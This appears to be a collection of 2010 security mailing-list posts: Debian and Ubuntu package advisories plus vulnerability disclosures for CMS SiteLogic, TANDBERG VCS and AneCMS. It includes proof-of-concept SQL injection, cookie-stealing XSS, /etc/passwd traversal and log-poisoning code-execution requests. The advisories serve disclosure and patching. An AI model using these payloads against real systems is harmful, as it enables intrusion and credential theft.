the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.dsc Size/MD5 checksum: 1201 abe81b0d3c4aa7a1fa418e29f2c5b297 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.diff.gz Size/MD5 checksum:19687 60ede1843ceb8a1f127c54b847a74dfa Architecture independent packages: http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny3_all.deb Size/MD5 checksum: 880 028b00e28aad8282714776c5dcca64a8 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_alpha.udeb Size/MD5 checksum:86562 d9c50af59951e972557d393409b75bf2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_alpha.deb Size/MD5 checksum: 287752 1d7d84aee223c0933d1a616722607096 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_alpha.deb Size/MD5 checksum: 182436 001ecbf421f70ca521a3968f1d14c874 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_amd64.udeb Size/MD5 checksum:71912 78fbe1a6568671e4c557ec12e29481b0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_amd64.deb Size/MD5 checksum: 254500 481312a64867f31c363b7fbba9cfe171 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_amd64.deb Size/MD5 checksum: 167864 3d285c20d2f080313f82eb09dcb7261b arm architecture (ARM) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_arm.udeb Size/MD5 checksum:64566 a4a9742190557d14beae40133fb46cf1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_arm.deb Size/MD5 checksum: 245438 a16f62e771622e05812172f7c7066504 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_arm.deb Size/MD5 checksum: 159612 81facf06de458dd6b1e84a78bb1acfc8 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_armel.udeb Size/MD5 checksum:67028 56fc4199656d239231c7b8d8e035fead http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_armel.deb Size/MD5 checksum: 245930 9f64181bc16af0ad0de4ba2e86b25706 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.
Vulnerabilities in CMS SiteLogic
Hello Bugtraq! I want to warn you about security vulnerabilities in CMS SiteLogic. It's Ukrainian commercial CMS. In addition to previously reported vulnerabilities (disclosed this year), I will report about vulnerabilities in this CMS, which I disclosed in 2009. - Advisory: Vulnerabilities in CMS SiteLogic - URL: http://websecurity.com.ua/3272/ - Affected products: all versions of CMS SiteLogic. - Timeline: 03.03.2008 - found vulnerabilities. 03.03.2008 - informed developers. First time I used private disclosure approach, but they just ignored (as holes in their CMS, as holes at their web site). So then I used responsible full disclosure approach. 08.02.2009 - informed admins of vulnerable web site where I found vulnerabilities (they also ignored). 27.06.2009 - disclosed at my site. 28.06.2009 - additionally informed developers. - Details: These are SQL Injection, Full path disclosure and Cross-Site Scripting vulnerabilities. SQL Injection: http://site/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1 Full path disclosure: http://site/index.php?mid=’ http://site/includes/stat.php XSS: http://site/index.php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/index.php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.cookie)%3C/script%3E Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
[SECURITY] [DSA 2031-1] New krb5 packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2031-1 secur...@debian.org http://www.debian.org/security/Giuseppe Iuculano April 11, 2010http://www.debian.org/security/faq - Package: krb5 Vulnerability : use-after-free Problem type : remote Debian-specific: no CVE ID : CVE-2010-0629 Debian Bug : 567052 Sol Jerome discovered that kadmind service in krb5, a system for authenticating users and services on a network, allows remote authenticated users to cause a denial of service (daemon crash) via a request from a kadmin client that sends an invalid API version number. For the stable distribution (lenny), this problem has been fixed in version 1.6.dfsg.4~beta1-5lenny3. The testing distribution (squeeze), and the unstable distribution (sid) are not affected by this issue. We recommend that you upgrade your krb5 package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/k/krb5/krb5_1.6.dfsg.4~beta1-5lenny3.dsc Size/MD5 checksum: 1537 5e303b1137773a3151e3c32c3e711707 http://security.debian.org/pool/updates/main/k/krb5/krb5_1.6.dfsg.4~beta1.orig.tar.gz Size/MD5 checksum: 11647547 08d6ce311204803acbe878ef0bb23c71 http://security.debian.org/pool/updates/main/k/krb5/krb5_1.6.dfsg.4~beta1-5lenny3.diff.gz Size/MD5 checksum: 852374 02717d2cea45f186eb05cd196d8035ac Architecture independent packages: http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.6.dfsg.4~beta1-5lenny3_all.deb Size/MD5 checksum: 2149738 7d91c163fb39f13e4bb9371d6700ec34 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum:72254 5f5136a8eb5b652ff3425220372982d6 http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum: 179752 6bfe9b06aefbd13d82e449001f061f07 http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum:92810 d28e976f4aaf8a7a3048144198a250fd http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc-ldap_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum: 112938 8a8f3658363a97fb221145454deea825 http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum:98620 ceb3367cea07913abcb6bf91db125abf http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum: 538482 5f795f3b40ef6a719b4477c21a331759 http://security.debian.org/pool/updates/main/k/krb5/krb5-pkinit_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum:70284 240ec4c435b3824878d9945807c10e2d http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum: 149846 059e17811c7ff7be4b3e80fb41b19929 http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum: 1351808 246d6c6583b4112ab05b294ae31674f6 http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum: 255514 949a91a2551f17746d37098298c05e3b http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum: 219390 8cf3087d18ad516640537ecbefc9a0cd http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum:98526 43677b97645fe8fd143ff676a1a7e63f http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.6.dfsg.4~beta1-5lenny3_alpha.deb Size/MD5 checksum:83188 c3630cba3fb62edc816221242cb032aa amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.6.dfsg.4~beta1-5lenny3_amd64.deb Size/MD5 checksum: 238796 045b29e14a6188aa596a209a3762b78e http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.6.dfsg.4~beta1-5lenny3_amd64.deb Size/MD5 checksum: 169808 099c0806d6f0010d1089d066991b1ad9 http://security.deb
CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval
Release Date: 2010-04-09
Application: Video Communication Server (VCS)
Versions: x4.3.0, x4.2.1, and possibly earlier
Severity: Medium
Discovered by: Jon Hart
Advisory by: Timothy D. Morgan
Vendor Status: Firmware update released [2]
CVE Candidate: CVE-2009-4511
Reference: http://www.vsecurity.com/resources/advisory/20100409-3/
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- ---
- From [1]:
"The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP Telephony
networks."
Vulnerability Overview
- --
On December 3rd, VSR identified a directory traversal and file retrieval
vulnerability in the TANDBERG's Video Communication Server. This issue would
allow an authenticated attacker (who has access as an administrator or less
privileged user on the web administration interface) to retrieve files from the
filesystem which are readable by the "nobody" system user.
Product Background
- --
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates,
along with number of other items.
Vulnerability Details
- -
The TANDBERG VCS web management interface provides two nearly identical scripts
at URLs:
https://vulnerable.example.com/helppage.php
https://vulnerable.example.com/user/helppage.php
These help pages accept a "file" parameter in the URL which can be used to
retrieve nearly arbitrary files from the filesystem. The relevant source code
for these pages is as follows:
// The following is Copyright (C) 2009 TANDBERG //
...
// Grab the content before we write anything: we'll need it for the title tag
in the
// Dig out the page title, from the tag,
// then remove any surround in the page as we add our own...
$filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix;
if (! file_exists($filename)) {
$helpHTML = "There is no help available for the ". $_GET['page'] . "
page";
$pageTitle = $_GET['page'];
}else{
$helpHTML = file_get_contents($filename);
...
echo "\n\n";
echo $helpHTML;
echo "\n";
...
// end of excerpt //
Here, the final path string ($filename) loaded and displayed to the user is
prepended with a directory and appended with a file extension. Using simple
directory traversal techniques ("../") it is possible to traverse to any
directory on the filesystem. Using a trailing NUL byte encoded in the URL (%00)
it is also possible to truncate the file path to eliminate the file extension.
For instance, the following URL retrieves the /etc/passwd file:
https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00
During testing, it was found that the x4.2.1 firmware runs the web server as the
"nobody" user, which somewhat limits the amount of sensitive information that
may be obtained. However, since shadowed passwords were not configured, it was
possible to retrieve all local system users' password hashes from /etc/passwd.
Additional password hashes are available in /tandberg/persistent/etc/digest.
Versions Affected
- -
VSR has successfully exploited this issue in firmware version x4.2.1. Based on
preliminary source code analysis[2], versions x4.3.0 and x5.0 also appear to be
vulnerable. Earlier versions have not been tested.
Vendor Response
- ---
The following timeline details TANDBERG's response to the reported issue:
2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22VSR provided TANDBERG a draft advisory.
2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware,
but this did not appear to correct the issue (based on PHP code
analysis alone).
2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware
for testing which appeared to correct the vulnerability.
2010-03-26TANDBERG provided VSR with a release candidate firmware for
version x5.1.1.
2010-04-07TANDBERG VCS firmware version x5.1.1 released [2].
2010-04-09
CVE-2009-4510: TANDBERG VCS Static SSH Host Keys
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: High Discovered by: Jon Hart Advisory by: Timothy D. Morgan Vendor Status: Firmware version x5.1.1 released [2]. CVE Candidate: CVE-2009-4510 Reference: http://www.vsecurity.com/resources/advisory/20100409-2/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: "The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks." Vulnerability Overview - -- On December 2nd, VSR identified a SSH service authentication weakness vulnerability in the TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides several system shell accounts accessible via the SSH protocol. Vulnerability Details - - The TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored in files: /tandberg/sshkeys/ssh_host_dsa_key /tandberg/sshkeys/ssh_host_dsa_key.pub In tested versions of the firmware, this default key has a fingerprint of: 49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8 No new key is generated upon installation. In addition, this default key would overwrite any SSH server keys, if installed by security-conscious administrators previously, during a firmware upgrade. Due to the public nature of this key (see firmware downloads [2]) an attacker would be able to conduct server impersonation and man-in-the-middle attacks on SSH connections directed at any TANDBERG VCS device. A successful exploit would most likely yield an attacker shell access to the device with privileges of the victim client. Versions Affected - - VSR has observed this vulnerability in version x4.2.1. Based on preliminary analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested. Vendor Response - --- The following timeline details TANDBERG's response to the reported issue: 2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately. 2009-12-22VSR provided TANDBERG a draft advisory. 2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue. 2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware, but this did not appear to correct the issue for existing installations, since old vulnerable keys would be preserved. 2010-01-28TANDBERG explained that changing SSH keys automatically on administrators may cause backward compatibility problems. Therefore, TANDBERG decided to preserve old keys even when upgrading a system which contains a vulnerable key. Administrators will instead be warned in the web console that a vulnerable key is in use and will be expected to update host keys manually. 2010-03-26TANDBERG provided VSR with a release candidate firmware for version x5.1.1. 2010-04-07TANDBERG VCS firmware version x5.1.1 released [2]. 2010-04-09VSR advisory released. Recommendation - -- Immediately replace the current SSH host key with a new one. This may be accomplished through one of several methods. One approach is to simply log in to the device locally and use the ssh-keygen utility to replace the keys stored in /tandberg/sshkeys/. Consult TANDBERG documentation for other methods. After replacing the SSH host keys, it is recommended that the VCS firmware be upgraded to X5.1.1 as soon as possible. NOTE: Upgrading or downgrading to versions prior to X5.1.1 will cause any custom SSH host keys to be overwritten. Version X5.1.1 and later should preserve any custom host keys previously installed. As a precaution, after upgrading or downgrading VCS f
[USN-927-3] Thunderbird regression
=== Ubuntu Security Notice USN-927-3 April 11, 2010 thunderbird regression https://launchpad.net/bugs/559918 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: thunderbird 2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2 After a standard system upgrade you need to restart Thunderbird to effect the necessary changes. Details follow: USN-927-1 fixed vulnerabilities in NSS. Due to upstream changes in NSS 3.12.6, Thunderbird would be unable to initialize the security component and connect with SSL/TLS if the old libnss3-0d transition package was installed. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user's session. This update adds support for the new new renegotiation extension and will use it when the server supports it. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2.diff.gz Size/MD5: 134402 4f55d904c22d00c1423fcdf778237df3 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2.dsc Size/MD5: 2362 5fbf0ab8c09988462ffad652d5724ec1 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly.orig.tar.gz Size/MD5: 36467375 a952c9895cc90b89f160c4b3694de834 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/mozilla-thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_all.deb Size/MD5:62220 92dafa6f0a04d064a0c96199ce9faef6 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/mozilla-thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_all.deb Size/MD5:62208 0e785915e1142f3bb25573651cd2a76b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_amd64.deb Size/MD5: 3738538 5d00b51452f0a5ada7aa859d4e073536 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_amd64.deb Size/MD5:62562 5f4e424d427833b1490f28ec3a5073e5 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_amd64.deb Size/MD5: 12558830 ea6aea8f8aea5a22927a33fa3d49e69a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_i386.deb Size/MD5: 3722604 00383caa32265845d431ba1c41370e51 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_i386.deb Size/MD5:62562 72a659110cc3ce2a8321c0a2f9475de6 http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_i386.deb Size/MD5: 11177860 de57f8a625ed43983853b3f1f1bbf567 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_lpia.deb Size/MD5: 3720600 dd62f203c661fdf8da663f6c5d53445e http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_lpia.deb Size/MD5:62564 79e32137bc4bc26ab33b3fd9c8db6067 http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_lpia.deb Size/MD5: 11025166 649235af94da5615278de12fd8ea4005 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_powerpc.deb Size/MD5: 3729730 a90d7dd672e198674a46a4c0f9e9dba1 http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_powerpc.deb Size/MD5:62562 6137b40f8bf9012911479830602ef04d http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_powerpc.deb Size/MD5: 12297146 45dae3dadc5ab90e41dc8e61ca30f67b sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.
AneCMS Multiple Vulnerabilities
##www.BugReport.ir
#
#AmnPardaz Security Research Team
#
# Title:AneCMS Multiple Vulnerabilities
# Vendor: http://anecms.com/
# Vulnerable Version: 1.0 (Latest version till now)
# Exploitation: Remote with a RAW HTTP packet sender
# Fix: N/A
###
- Description:
AneCMS is a small and fast CMS completely modular. Written in PHP with
JS(jQuery), Multilanguage, Skinnable
and has an online repository of modules accessible from the ACP of the
CMS. Using MySQL as the backend DBMS.
- Vulnerability:
+--> Local File Inclusion (LFI)
The AneCMS try to locate local files for responding users according
to GET parameters. There are 25 infected
files, but approximately whole of them are protected else of the
'index.php' and 'rss.php' files. Check the
exploits section for the details.
+--> Remote Code Execution
With a RAW HTTP packet sender, you can send unescaped php code to
AneCMS. Then this code can be executed using
the LFI vulnerability. Check the exploits section for the details.
- Exploits/PoCs:
+--> Exploiting The Local File Inclusion (LFI)
For the 'rss.php', you can select local file relative path from the
'modules' directory using 'module' GET
parameter. For example following URI can be used for inspecting the
'.htaccess' file:
http://target.com/rss.php?module=../.htaccess%00
For the 'index.php', you can select local file relative path from the
'system/ajax' directory using 'ajax' GET
parameter. For example following URI can be used for inspecting the
'.htaccess' file:
http://target.com/index.php?ajax=../../.htaccess%00
+--> Remote Code Execution
This attack should be done in two phases. First use the LFI to inject
the desired php code in the web server
log file. Then use the LFI again to execute it.
For example if you want to run '' code,
first send the following HTTP packet:
GET /rss.php?module=../%00 HTTP/1.0
Host: target.com
User-Agent: UA
This packet will inject the '' in the
error logs. Then visit following URI:
http://target.com/rss.php?module=../the/path/to/logs/folder/logs/php_error.log%00
Above URI will include the error log (including your injected code)
and execute it.
- Solution:
Instead of generating the inclusion path by GET parameters directly,
check the value of the parameter and
then include the valid hard-coded file path.
- Original Advisory:
http://www.bugreport.ir/index_71.htm
- Credit:
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
HITBSecConf DUBAI 2010: Learn more about web attacks and stealth hacking
Hi Folks, If you are interested by web attacks and stealth hacking, come and join us at HITBSecConf Dubai [ http://conference.hackinthebox.org/hitbsecconf2010dxb/?page_id=680 ]. Next 21st April, TEHTRI-Security will talk about web security, during this presentation: "Silent Steps: Improving the Stealthiness of Web Hacking". This will include in particular: - Bunches of 0-days against widely deployed web applications - A new technical method for web attackers to improve their stealthiness during an intrusion - A global analysis of fingerprints left by attackers during each step of a web attack (backdoors, bounces...) and how to detect them See you soon at HITBSecConf Dubai... Laurent OUDOT, founder & CEO of TEHTRI-Security, "/This is not a game./" http://www.tehtri-security.com
VUPEN Security Research - VMware Products Movie Decoder Heap Overflow Vulnerability
VUPEN Security Research - VMware Products Movie Decoder Heap Overflow Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND - "VMware is a provider of virtualization software which runs on Microsoft Windows, Linux, and Mac OS X. VMware's enterprise software, VMware ESX Server, runs directly on server hardware without requiring an additional underlying operating system". from wikipedia II. DESCRIPTION - VUPEN Vulnerability Research Team discovered a vulnerability in VMware products. The flaw is caused by a heap overflow error in the VMnc media codec when processing malformed AVI files, which could be exploited by attackers to potentially execute arbitrary code by tricking a user into opening a malicious movie file. III. AFFECTED PRODUCTS --- VMware Workstation versions prior to 6.5.4 build 246459 VMware Player versions prior to 2.5.4 build 246459 VMware Server versions 2.x VMware Movie Decoder versions prior to 6.5.4 Build 246459 IV. Binary Analysis & Proof-fo-concept --- In-depth binary analysis of the vulnerability and a PoC have been released by VUPEN through the VUPEN Binary Analysis & Exploits Service : http://www.vupen.com/exploits/ V. SOLUTION Upgrade to VMware Workstation version 6.5.4 build 246459: http://downloads.vmware.com/download/download.do?downloadGroup=WKST-654-WIN Upgrade to VMware Player version 2.5.4 build 246459 : http://downloads.vmware.com/download/player/player_reg.html Upgrade to VMware Movie Decoder version 6.5.4 Build 246459 : http://download3.vmware.com/software/wkst/VMware-moviedecoder-6.5.4-246459.exe VI. CREDIT -- The vulnerability was discovered by Sebastien Renaud of VUPEN Security VII. ABOUT VUPEN Security --- VUPEN is a leading IT security research company providing vulnerability management and security intelligence solutions which enable enterprises and institutions to eliminate vulnerabilities before they can be exploited, ensure security policy compliance and meaningfully measure and manage risks. Governmental and federal agencies, and global enterprises in the financial services, insurance, manufacturing and technology industries rely on VUPEN to improve their security, prioritize resources, cut time and costs, and stay ahead of the latest threats. * VUPEN Vulnerability Notification Service: http://www.vupen.com/english/services/ * VUPEN Binary Analysis & Exploits Service : http://www.vupen.com/exploits/ VIII. REFERENCES -- http://www.vupen.com/english/advisories/2010/0852 http://lists.vmware.com/pipermail/security-announce/2010/90.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1564 IX. DISCLOSURE TIMELINE --- 2009-09-14 - Vendor notified 2009-09-14 - Vendor response 2009-10-09 - Status update received 2009-10-27 - Status update received 2010-01-29 - Status update received 2010-03-05 - Status update received 2010-03-31 - Status update received 2010-04-09 - Coordinated public Disclosure
